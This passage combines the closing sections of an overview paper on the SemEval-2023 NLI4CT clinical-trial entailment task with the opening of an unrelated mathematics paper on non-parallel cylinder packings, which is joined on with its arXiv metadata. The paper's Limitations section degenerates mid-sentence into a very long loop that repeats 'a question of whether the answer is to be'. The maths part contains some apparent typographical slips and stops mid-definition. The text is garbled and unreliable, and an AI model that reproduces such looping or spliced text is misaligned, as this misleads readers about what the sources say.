(Alameldin and Williamson, 2023). Therefore extracting a condensed set of evidence facts, prevents the information from being lost by truncation. Even for generative models adapted to receive longer sequences of text, there is still a risk of distractors present in the CTR premise interfering with the inference process, particularly with respect to numerical inference. Retrieving evidence before inference does not result in better entailment task performance.Systems that execute the evidence selection task, extract relevant evidence from the premise with respect to the statement, and then use the retrieved evidence for the entailment task (Pre), do not demonstrate significantly higher F1 than models which perform the inference over the entire premise (Post), shown in Table 2. As mentioned previously the cost of excluding relevant information is significant, and systems that perform inference over the entire premise circumvent this cost as they effectively have an evidence extraction Recall of 1.0 at the inference step. Retrospective evidence retrieval induces confirmation bias.11 participants submit to both tasks, and 6 participants opt to classify the entailment, then retrieve evidence from the premise to support the classification. Conversely, 5 participants first extract relevant evidence and then classify the entailment based on selected evidence. There is no significant difference in the results of these clusters for the entailment task, however for the evidence selection task, systems that first collect evidence average +0.045 F1, and +0.07 Precision compared to those that retrospectively select evidence. These clusters report identical average Recall. Therefore, we hypothesize that retrospective systems exhibit confirmation bias, as selected evidence must be relevant to both the statement and the predicted label. The expected effects of reducing the input size by filtering out irrelevant parts of the premise are not evident in the reported results. ### Limitations Joint inference systems may generalize poorly without prior knowledge.NLI4CT was constructed using a negative-rewriting strategy (Section 5), this results in one contradictory statement and one entailment statement for each CTR premise. Alissa and Abdullah (2023) @JUST-KM and Zhou et al. (2023) @THiFLY leverage this feature. These systems perform inference over statement pairs with shared premises and assign the entailment label to the statement with the highest confidence, and then assign the contradiction label to the remaining statement, regardless of confidence. Zhou et al. (2023) @THiFLY reports that this process improves entailment task performance by +0.8 F1. The limitations of this approach are that this is heavily reliant on the knowledge that only one statement is entailed, and therefore this approach may generalize poorly where this knowledge is not sufficient to capture the question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to a question of whether the answer is to be a question of whether the answer is to be a question of whether the answer is to a question of whether the answer is to be a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether whether the answer is to a question of a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether whether the answer is to a question of whether the answer is to a question of whether whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether the answer is to a question of whether whether the answer is to a question of a edge is unavailable. ## 8 Statistical Artifacts Statistical characteristics such as imbalanced sequence lengths, token distributions, or discriminative conditions that are disproportionately associated with a particular class can superficially inflate model performance Herlihy and Rudinger (2021). Alameldin and Williamson (2023) @Clemson NLP observes that systems are able to outperform the random baseline on the entailment task using only the statements, this indicates that systems are able to exclusively rely on the presence of superficial statistical patterns within the collection of statements, without learning the underlying rules of the tasks, reporting an F1 of 0.584. This is significantly below the majority baseline (0.66 F1), and as the entailment task is a binary classification task we conclude that the effects of these artifacts on the submitted results are very minimal. Alameldin and Williamson (2023) @Clemson NLP identifies minor differences in statement lengths across classes, however, in our analysis we did not find a significant difference. Additionally, we retrieve the 15 most frequently used tokens in the statements for both classes, although we observed some uneven distributions in the training set, these distributions were not present or even inversely correlated in the test set. Therefore, we do not believe either of these characteristics explains the observed results, and claim that NLI4CT is robust to statistical biases. ## 9 Conclusion This paper presents the systems and results submitted to the SemEval-2023 Task 7 on the NLI4CT dataset. The tasks are challenging, with the majority of submitted systems failing to significantly outperform the majority class baseline on the entailment task. Potentially due to the requirement for sophisticated numerical reasoning, an elevated frequency of biomedical expressions, or the relatively small training set. We observe significantly better performance on the evidence selection task than on the entailment task, and we find that there is no consistent correlation between task performances. The impact of biomedical pre-training is significantly less profound than expected, far outweighed by the effects of increased model size. There is a direct correlation between model size and task performance, with MLMs achieving the highest results in both tasks. There remains room for improvement on both tasks, potentially by exploiting data augmentation to increase training set size, leveraging the zero-shot capabilities of models such as GPT and T5, or through the direct integration of domain knowledge from ontologies. A further error analysis is necessary to evaluate the impact of biomedical pre-training on MLMs, consistency of performance across sections, generalization ability of models trained on NLI4CT, and comparison of performance on numerical versus biomedical instances.
2310.06943
On non-parallel cylinder packings
In this paper we will discuss optimal lower and upper density of non-parallel cylinder packings in $R^{3}$ and similar problems. The main result of the paper is a proof of the conjecture of K. Kuperberg for upper density (existence of a non-parallel cylinder packing with upper density ${\pi}/{\sqrt{12}}$). Moreover, we prove that for every $\varepsilon > 0$ there exists a nonparallel cylinder packing with lower density greater then ${\pi}/{6} - \varepsilon$.
Ofek Eliyahu
2023-10-10T19:01:12Z
http://arxiv.org/abs/2310.06943v1
# On non-parallel cylinder packings ###### Abstract In this paper we will discuss optimal lower and upper density of non-parallel cylinder packings in \(\mathbb{R}^{3}\) and similar problems. The main result of the paper is a proof of K. Kuperberg's conjecture for upper density (existence of a non-parallel cylinder packing with upper density \(\pi/\sqrt{12}\)). Moreover, we prove that for every \(\varepsilon>0\) there exists a non-parallel cylinder packing with lower density greater then \(\frac{\pi}{6}-\varepsilon\). ## 1 Introduction Denote by \(B_{r}^{n}(x_{0})\subset\mathbb{R}^{n}\) the ball of radius \(r\) (with respect to the Euclidean metric) with center at a point \(x_{0}\). Let \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) be congruent disjoint bodies in \(\mathbb{R}^{n}\). We define \[\delta^{+}(\mathcal{C})=\limsup_{r\to\infty}\frac{\operatorname{Vol}\bigl{(} B_{r}^{n}(0)\cap\bigcup_{i=1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^ {n}(0))},\] and \[\delta^{-}(\mathcal{C})=\liminf_{r\to\infty}\frac{\operatorname{Vol}\bigl{(} B_{r}^{n}(0)\cap\bigcup_{i=1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^ {n}(0))}.\] Also, provided the limit exists, we define \[\delta(\mathcal{C})=\lim_{r\to\infty}\frac{\operatorname{Vol}\bigl{(}B_{r}^{n} (0)\cap\bigcup_{i=1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^{n}(0) )}.\] From now we consider only the values \(n=3\) and \(n=2\), and for \(n=2\) we will denote \(\operatorname{Vol}\) by Area. We say that a circle packing in \(\mathbb{R}^{2}\) is a **lattice packing** if the centers of the circles form a lattice. In 1773, Joseph-Louis Lagrange proved that the highest-density lattice packing of circles is the hexagonal lattice. In 1942, Laszlo Fejes Toth proved that this packing is optimal among all circle packings (and that it's density is \(\frac{\pi}{\sqrt{12}}\approx 0.9068\)). A proof of that can be found in [1]. Let \(\ell\) be a line in \(\mathbb{R}^{3}\), and let \(r>0\). The **infinite circular cylinder with axis \(\ell\) and radius \(r\)** is the set of all points in \(\mathbb{R}^{3}\) that lie at distance smaller than \(r\) from \(\ell\). Two infinite cylinders are said to be **parallel** if their axes are parallel. A collection \(\mathcal{C}\) of infinite cylinders with the same radius is called a **cylinder packing** if the interiors of the cylinders in \(\mathcal{C}\) are pairwise disjoint. A cylinder packing is called a **non-parallel cylinder packing** if no two cylinders in it are parallel. In 1989, A. Bezdek and W. Kuperberg, [2], proved that for every cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) one has \(\delta^{+}(\mathcal{C})\leq\frac{\pi}{\sqrt{12}}\). It is clear that this bound is tight among all cylinder packings. In 1990, K. Kuperberg, [3], proved that there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})>0\) (for her packing, \(\delta^{-}(\mathcal{C})=\frac{\pi^{2}}{576}\approx 0.0171\)). She conjectured that the bound \(\frac{\pi}{\sqrt{12}}\) is also tight among non-parallel cylinder packings, and that there exists a non-parallel cylinder packing with density \(\frac{\pi}{\sqrt{12}}\) (she did not specify whether she meant lower or upper density). One can define two more notions of density: \[(\delta^{*})^{+}(\mathcal{C})=\limsup_{r\to\infty}\left(\sup_{x_{0}\in \mathbb{R}^{n}}\frac{\operatorname{Vol}\bigl{(}B_{r}^{n}(x_{0})\cap\bigcup_{i =1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^{n}(0))}\right)\] and \[(\delta^{*})^{-}(\mathcal{C})=\liminf_{r\to\infty}\left(\inf_{x_{0}\in \mathbb{R}^{n}}\frac{\operatorname{Vol}\bigl{(}B_{r}^{n}(x_{0})\cap\bigcup_{i =1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^{n}(0))}\right)\] In some cases these two quantities are more natural than \(\delta^{+}\) and \(\delta^{-}\) because they are invariant under translations and do not assign a special role to the origin. It is not hard to see that for every cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) one has that \((\delta^{*})^{+}(\mathcal{C})\geq\delta^{+}(\mathcal{C})\) and \((\delta^{*})^{-}(\mathcal{C})\leq\delta^{-}(\mathcal{C})\). But in fact one can do a reduction to the result of Bezdek and Kuperberg and show that \((\delta^{*})^{+}(\mathcal{C})\leq\frac{\pi}{\sqrt{12}}\) for every cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\). In 1997, Claudia and Peter Graf, [4], showed that there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})=\frac{5}{12}\). In 2014, T. Hales proved that the maximal density of sphere packings is \(\frac{\pi}{3\sqrt{2}}\approx 0.7404\). His proof used complex computer calculations, and solved the Kepler conjecture, which was one of the most challenging open problems on this topic [5]. In 2018, D. Ismailescu and P. Laskawiec, [6], showed that there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})=\frac{1}{2}\). They conjectured that for every non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) there exists a sequence of holes with radius tending to infinity, i.e., there exist sequences \(b_{n},r_{n}\to\infty\) as \(n\to\infty\) such that for all \(n\in\mathbb{N}\) one has that \(B(r_{n},b_{n})\cap(\bigcup_{i=1}^{\infty}(C_{i}))=\emptyset\), which implies that \((\delta^{*})^{-}(\mathcal{C})=0\) for every non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\). In Section 2 of this paper, we prove that for every \(\varepsilon>0\) there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})\geq\frac{\pi}{6}-\varepsilon\) (theorem 2.2). In Section 3, we show that there exists a non-parallel cylinder packing with \(\delta^{+}(\mathcal{C})=\frac{\pi}{\sqrt{12}}\) (in particular, \((\delta^{*})^{+}=\frac{\pi}{\sqrt{12}}\)), i.e., a non-parallel cylinder packing with optimal upper density. This proves the aforementioned conjecture of K. Kuperberg. In fact we show a more general result, namely, we construct a non-parallel cylinder packing from a lattice circle packing, such that the upper density of the cylinder packing equals the density of the original circle packing. From now, we denote by O the origin, both in \(\mathbb{R}^{2}\) and both in \(\mathbb{R}^{3}\). ## 2 Existence of a cylinder packing with higher lower density **Theorem 2.1**.: _For every \(\varepsilon>0\), there are \(K,L>0\) which satisfy \(L^{2}=K^{2}+1\) and \(r_{0}>0\) such that the following holds: Let \(A_{1}=(x_{1},y_{1}),A_{2}=(x_{2},y_{2})\in\mathbb{R}^{2}\) be arbitrary points with integer Euclidean norms \(d_{1}=\|A_{1}\|\) and \(d_{2}=\|A_{2}\|\) which satisfy the two conditions_ \[d_{1},d_{2}\geq r_{0}\] _and_ \[\widetilde{c}\geq\frac{1+\varepsilon}{\max{(d_{1},d_{2})}},\] _where \(\widetilde{c}\) is the angle between the lines that pass through the points \(O\) and \(A_{1}\) and \(O\) and \(A_{2}\), respectively, i.e., \(\widetilde{c}=\angle A_{1}OA_{2}\)._ _Then_ \[\operatorname{dist}(\ell_{1},\ell_{2})\geq 1,\] _where \(\ell_{1}=\{(x_{1},y_{1},0)+t(y_{1},-x_{1},Kd_{1}+L):t\in\mathbb{R}\}\), \(\ell_{2}=\{(x_{2},y_{2},0)+t(y_{2},-x_{2},Kd_{2}+L):t\in\mathbb{R}\}\)_ Proof.: Let \(\varepsilon>0\). By Ismailescu and Laskawiec's calculation in [6], Lemma 3.4, we have that \[(\mbox{dist}(\ell_{1},\ell_{2}))^{2}=\] \[\frac{(1-c)^{2}d_{1}^{2}d_{2}^{2}\gamma^{2}+2L(1-c)d_{1}d_{2}\gamma(d_{2}-d_{1} )^{2}+L^{2}(d_{2}-d_{1})^{4}}{-(1-c)^{2}d_{1}^{2}d_{2}^{2}+2(1-c)d_{1}d_{2}[L^{2} (1+d_{1}d_{2})+KL(d_{1}+d_{2})]+L^{2}(d_{2}-d_{1})^{2}}, \tag{1}\] where \(c=\cos\widetilde{c}\) and \(\gamma=(Kd_{1}+Kd_{2}+2L)\). The constants \(L,K\) will be chosen to satisfy: 1. \[K^{2}>\frac{1+0.25\varepsilon}{1+0.5\varepsilon}L^{2}\] 2. \[\forall h>0:\quad\frac{1+2\varepsilon+\frac{\varepsilon^{2}}{2}}{2(1+h)}(2+h) ^{2}K^{2}\geq\frac{1+2\varepsilon}{2}\cdot\frac{(2+h)^{2}}{1+h}L^{2}\] 3. \[K^{2}\geq 0.99L^{2}\] which is clearly satisfied for \(L\) large enough since \(L^{2}=K^{2}+1\). Then, the constant \(r_{0}\) will be chosen such that for every \(d_{1}>r_{0}\): 1. \[1-\cos\left(\frac{1+\varepsilon}{d_{1}}\right)>\frac{1+0.25\varepsilon}{2d_{1 }^{2}}\] by Taylor expansion of order 2 of the function \(\cos x\), clearly this is satisfied for \(r_{0}\) large enough for all \(d_{1}\geq r_{0}\). 2. \[L^{2}+2KLd_{1}<0.25\varepsilon L^{2}d_{1}^{2}\] 3. \[\forall h>0\] \[\left[(1+2\varepsilon)\left(2+\frac{h^{2}}{2(1+h)}\right)+4h^{2}-2h-2-\frac{2}{ d_{1}^{2}}\right]\geq 3.999\varepsilon+4h^{2}-2h\] 4. \[\frac{1}{100}[L^{2}\delta^{2}d_{1}^{2}(\delta^{2}d_{1}^{2}-1)]\geq 2.5L^{2}d_{1}^{2}.\] which clearly holds when \(r_{0}\) is large enough for all \(d_{1}\geq r_{0}\). We consider two separate cases. Case 1: \(d_{1}=d_{2}\), note that in this case \[\left(\mathrm{dist}(\ell_{1},\ell_{2})\right)^{2}= \frac{(1-c)^{2}d_{1}^{4}\gamma^{2}}{-(1-c)^{2}d_{1}^{4}+2(1-c)d_{1 }^{2}[L^{2}(1+d_{1}^{2})+2KLd_{1}]}\] \[\geq\frac{(1-c)^{2}d_{1}^{4}\gamma^{2}}{2(1-c)d_{1}^{2}[L^{2}(1+d_ {1}^{2})+2KLd_{1}]}\] \[=\frac{(1-c)d_{1}^{2}\gamma^{2}}{2[L^{2}(1+d_{1}^{2})+2KLd_{1}]}\] \[\geq\frac{(1-\cos(\frac{1+\varepsilon}{d_{1}})d_{1}^{2}\gamma^{2} }{2[L^{2}(1+d_{1}^{2})+2KLd_{1}]},\] \[\underset{(i)}{\geq}\frac{\frac{1+0.5\epsilon}{2d_{1}^{2}}d_{1} ^{2}\gamma^{2}}{2[L^{2}(1+d_{1}^{2})+2KLd_{1}]},\] \[\underset{(1)}{\geq}\frac{\frac{1+0.25\epsilon}{2d_{1}^{2}}d_{1 }^{2}(2Ld_{1})^{2}}{2[L^{2}(1+d_{1}^{2})+2KLd_{1}]}\] \[\underset{(ii)}{\geq}\frac{2L^{2}d_{1}^{2}(1+0.25\epsilon)}{2L^{ 2}d_{1}^{2}(1+0.25\epsilon)}=1,\] which completes the proof for this case. Case 2: \(d_{1}\neq d_{2}\). From (1), an algebraic manipulation shows that \(\mathrm{dist}(\ell_{1},\ell_{2})\geq 1\) if and only if \(\Delta\geq 0\), where \[\Delta =(1-c)^{2}d_{1}^{2}d_{2}^{2}\big{[}1+\gamma^{2}\big{]}+L^{2}(d_{2 }-d_{1})^{2}\big{[}(d_{2}-d_{1})^{2}-1)\big{]}\] \[+2(1-c)d_{1}d_{2}\big{[}KL(d_{1}+d_{2})((d_{2}-d_{1})^{2}-1)+L^{2 }(2d_{1}^{2}-5d_{1}d_{2}+2d_{1}^{2}-1)\big{]}.\] Denote \[(2)\ \ \ \ \widetilde{\Delta}=(1-c)d_{1}d_{2}(1+\gamma^{2})+2L^{2}(2d_{1}^{ 2}-5d_{1}d_{2}+2d_{1}^{2}-1)\] and \[\widetilde{\widetilde{\Delta}}=\bigg{[}\frac{1}{(1-c)d_{1}d_{2}}L^{2}\big{(} d_{2}-d_{1}\big{)}^{2}+2KL\big{(}d_{2}+d_{1}\big{)}\bigg{]}\,\big{[}(d_{2}-d_{1})^{2} -1\big{]}.\] Then \(\Delta=(1-c)d_{1}d_{2}(\widetilde{\Delta}+\widetilde{\widetilde{\Delta}})\). For every \(d_{1}\neq d_{2}\) we have \((d_{2}-d_{1})^{2}-1\geq 0\) (since \(d_{1},d_{2}\) are integers), so \(\widetilde{\widetilde{\Delta}}\geq 0\). Consequently, if \(\widetilde{\Delta}\geq 0\), then \(\Delta\geq 0\). Assume without loss of generality that \(d_{1}<d_{2}\). Denote \(d_{2}=(1+h)d_{1}\), where \(h>0\). Then \[\widetilde{\Delta}\geq\bigg{[}1-\cos\frac{1+\varepsilon}{(1+h)d_{1 }}\bigg{]}\cdot(1+h)d_{1}^{2}\big{(}K(2+h)d_{1}\big{)}^{2}\] \[\qquad+2L^{2}\big{[}d_{1}^{2}(2+2(1+h)^{2}-5(1+h))-1\big{]}\] \[\underset{\text{Taylor}}{=}\frac{1}{2}\bigg{[}\frac{1+\varepsilon} {(1+h)d_{1}}\bigg{]}^{2}\cos\widetilde{x}\big{(}1+h)^{2}d_{1}^{2}\big{(}(2+h) Kd_{1}\big{)}^{2}\] \[\qquad+2L^{2}\big{[}d_{1}^{2}(2h^{2}-h-1)-1\big{]},\] where \(0\leq\widetilde{x}\leq\frac{1+\varepsilon}{(1+h)d_{1}}\). Note that \(\widetilde{x}\to 0\) when \(d_{1}\to\infty\), and since \(\lim_{x\to 0}\cos x=1\), for \(d_{1}\) large enough we have \((1+\varepsilon)^{2}\cos x>1+2\varepsilon+\frac{\varepsilon^{2}}{2}\). It follows that \[\widetilde{\Delta}\geq\frac{1+2\varepsilon+\frac{\varepsilon^{2}} {2}}{2(1+h)^{2}d_{1}^{2}}(1+h)d_{1}^{2}(2+h)^{2}d_{1}^{2}K^{2}+2L^{2}\big{[}d_ {1}^{2}(2h^{2}-h-1)-1\big{]}\] \[\qquad=\frac{1+2\varepsilon+\frac{\varepsilon^{2}}{2}}{2(1+h)}(2 +h)^{2}d_{1}^{2}K^{2}+L^{2}d_{1}^{2}\left[2(2h^{2}-h-1)-\frac{2}{d_{1}^{2}}\right]\] \[\underset{\text{(2)}}{\geq}\frac{1+2\varepsilon}{2}\cdot\frac{( 2+h)^{2}}{1+h}L^{2}d_{1}^{2}+L^{2}d_{1}^{2}\left[2(2h^{2}-h-1)-\frac{2}{d_{1}^{ 2}}\right]\] \[\qquad=L^{2}d_{1}^{2}\left[(1+2\varepsilon)\left(2+\frac{h^{2}}{ 2(1+h)}\right)+4h^{2}-2h-2-\frac{2}{d_{1}^{2}}\right]\] \[\underset{\text{(iii)}}{\geq}L^{2}d_{1}^{2}(3.999\varepsilon+4h^ {2}-2h).\] We see that for \(L\) and \(d_{1}\) large enough, (3) \(\widetilde{\Delta}\geq L^{2}d_{1}^{2}(3.999\varepsilon+4h^{2}-2h)\). Now let \(\delta\geq 0\) be such that for every \(0\leq h\leq\delta\) we have \(4h^{2}-2h\geq-\varepsilon\). Then, for every \(0\leq h\leq\delta\) we get \[\Delta=(1-c)d_{1}d_{2}(\widetilde{\Delta}+\widetilde{\widetilde{\Delta}})\geq( 1-c)d_{1}d_{2}\widetilde{\Delta}\geq(1-c)(3.99\varepsilon-\varepsilon)\geq 0.\] For \(h\geq\delta\) we consider two cases: 1. If \((1-c)d_{1}d_{2}\leq 100\), then \[\widetilde{\widetilde{\Delta}}\geq\frac{1}{100}[L^{2}\delta^{2}d_{1}^{2}( \delta^{2}d_{1}^{2}-1)]\underset{\text{(iv)}}{\geq}2.5L^{2}d_{1}^{2}.\] Since for every \(h\geq 0\) the inequality \(4h^{2}-2h\geq-2\) holds, we get that \[\begin{split}\Delta&=(1-c)d_{1}d_{2}(\widetilde{ \Delta}+\widetilde{\widetilde{\Delta}})\geq(1-c)d_{1}d_{2}L^{2}d_{1}^{2}(2.5+3.9 \varepsilon+4h^{2}-2h)\\ &\geq(1-c)d_{1}d_{2}L^{2}d_{1}^{2}(0.5+4h^{2}+3.99\varepsilon) \geq 0.\end{split}\] 2. If \((1-c)d_{1}d_{2}\geq 100\), we again consider two separate cases: 1. If \(h\leq 1\), then, by the definition of \(\widetilde{\Delta}\) (2), we get that \[\widetilde{\Delta}\geq 100(1+\gamma^{2})-2L^{2}\cdot 10d_{1}^{2}\underset{(3)}{ \geq}9B^{2}d_{1}^{2}-20L^{2}d_{1}^{2}\geq 0,\] and so \(\Delta\geq 0\). 2. If \(h>1\), then \(4h^{2}-2h\geq 2h\geq 0\), and using (3) we get that \[\Delta\geq(1-c)d_{1}d_{2}\widetilde{\Delta}\geq(1-c)L^{2}d_{1}^{2}(3.99 \varepsilon+4h^{2}-2h)\geq 0.\] Thus, for every \(h>0\) we have \(\Delta\geq 0\), which completes the proof. **Theorem 2.2**.: _For every \(\varepsilon>0\), there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with lower density \(\delta^{-}(\mathcal{C})\geq\frac{\pi}{6}-\varepsilon\)._ Construction: Let \(\varepsilon>0\), and let \(L,K,r_{0}\) be three (large enough) constants such that the statement of theorem 2.1 holds for these values. For each \(n\geq r_{0}\), let \(k\) be the (unique) natural number such that \(2^{k}\leq n<2^{k+1}\). We define \[\mathcal{A}_{n}=\left\{n\left(\cos\frac{(1+\varepsilon)\cdot j}{2^{k}},\sin \frac{(1+\varepsilon)\cdot j}{2^{k}},0\right)\ \Big{|}1\leq j\leq\frac{2\pi}{1+\varepsilon}\cdot 2^{k }\right\}\] Now for every \(n\geq r_{0}\) we draw from every point \(A=(x,y,0)\in\mathcal{A}_{n}\) the line \(\ell_{A}=(x,y,0)+t(y,-x,Kn+L)\), and then around each such line we take the cylinder of radius \(\frac{1}{2}\). Let \(C_{n}\) be the set of all the cylinders corresponding to \(n\). For every \(2\) cylinders as above (which might correspond to the same \(n\) or to distinct values of \(n\)), if they come from \(2\) points which lie on a straight line with the origin, the axes lie in \(2\) parallel planes which are perpendicular to the xy-plane and the distance between them is at least \(1\), so the distance between the axes is at least \(1\). Else, for every \(n_{1}\geq n_{0}\), for \(i=0,1\) let \(k_{i}\) be the (unique) natural number such that \(2^{k_{i}}\leq n_{i}<2^{k_{i}+1}\). Let \(A_{0}\in\mathcal{A}_{0}\), \(A_{1}\in\mathcal{A}_{1}\), and assume that \(A_{0}\), \(A_{1}\), O not lie on a straight line. Clearly that \(\angle A_{0}OA_{1}\) is of the form \(\frac{(1+\varepsilon)\cdot m}{2^{k_{1}}}\) for an integer \(m\). Since \(2^{k_{1}}\leq\|A_{1}\|\) the assumptions of theorem 2.1 are satisfied. Then, by theorem 2.1, the distance between the axes is at least 1. So the cylinders are disjoint and it's a cylinder packing. Denote the resulting cylinder packing by \(\mathcal{C}\) (the union about all \(n\geq r_{0}\)). That is, \(\mathcal{C}=\bigcup_{n\geq r_{0}}C_{n}\). **Definition 2.1**.: _Let \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) be a cylinder packing such that the axes of all the cylinders in \(C_{i}\) intersect the \((x,y)\)-plane. The_ **dual circle packing** _of \(\mathcal{C}\), denoted \(\widetilde{\mathcal{C}}\), is the circle packing in the plane that consists of all the circles that are centered at the points where the axes of the cylinders \(C_{i}\) intersect the \((x,y)\)-plane and each circle has the same radius as the corresponding cylinder._ **Definition 2.2**.: _Let \(C\) be a cylinder with axis that intersects the \((x,y)\)-plane, but not contained in this plane. The_ **dual cylinder** _of \(C\), 